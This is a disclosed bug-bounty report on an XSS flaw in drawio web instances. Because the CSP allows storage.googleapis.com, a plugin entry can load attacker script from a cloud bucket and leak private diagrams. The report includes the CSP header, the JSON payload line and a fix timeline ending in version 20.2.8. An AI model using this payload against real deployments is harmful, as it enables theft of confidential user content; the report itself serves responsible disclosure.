XSS with CSP bypass on WEB instances in jgraph/drawio

Valid

Reported on

Sep 5th 2022


📝 Description

Drawio WEB instancesn allows https://storage.googleapis.com in CSP script-src, abusing the XSS found in this report, it is possible to bypass the CSP and leak private diagram content.

🕵️‍♂️ Proof of Concept

On the web application side, the javascript execution is protected by the following CSP:

...
script-src https://www.dropbox.com https://api.trello.com 'self' https://viewer.diagrams.net https://storage.googleapis.com https://apis.google.com https://*.pusher.com 'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes=' 'sha256-r/ILW7KMSJxeo9EYqCTzZyCT0PZ9gHN1BLgki7vpR+A=' 'sha256-5DtSB5mj34lxcEf+HFWbBLEF49xxJaKnWGDWa/utwQA=' 'sha256-vS/MxlVD7nbY7AnV+0t1Ap338uF7vrcs7y23KjERhKc='
...

Because it allows you to load script from https://storage.googleapis.com which is the public URL for Google Cloud Bucket, it is possible to use it to execute our code.

{
  "plugins": [
    "https://storage.googleapis.com/bypass_csp/xss.js"
  ]
}

xss_web.png

Impact

An attacker could use it to access any user's confidential content.

We are processing your report and will contact the jgraph/drawio team within 24 hours. 3 months ago
David Benson validated this vulnerability 3 months ago
Mizu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Benson marked this as fixed in 20.2.8 with commit 59887e 3 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
David Benson
3 months ago

Maintainer


Thanks for report, entry has been removed from CSP.

to join this conversation